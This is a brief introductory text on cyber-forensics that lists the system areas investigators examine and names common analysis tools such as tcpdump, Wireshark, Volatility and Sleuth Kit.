Cyber-forensics means looking for digital tracks of attacks and malicious events with the goals of identifying the perpetrator and providing reports to solve the issue and prevent future abuse.
Forensics requires investigating all potential areas:
- Memory
- Applications / processes
- Logging information (from services, authentication, system updates, installs)
- Filesystem
- Network traffic (at different levels: low-level packets, protocol information, network application data)
- Disk information (hidden data in hidden files, partition information)
- Mobile devices
- Cloud / Remote systems
- Databases
Forensics investigators use their experience, a large palette of tools and best practices to extract information of a given system / infrastructure that has been under attack.
Tools can vary from basic system / network analysis tools (find, ps, tcpdump, Wireshark) to full fledged solutions that automate a lot of the work (Volatility, Sleuth Kit, CAINE).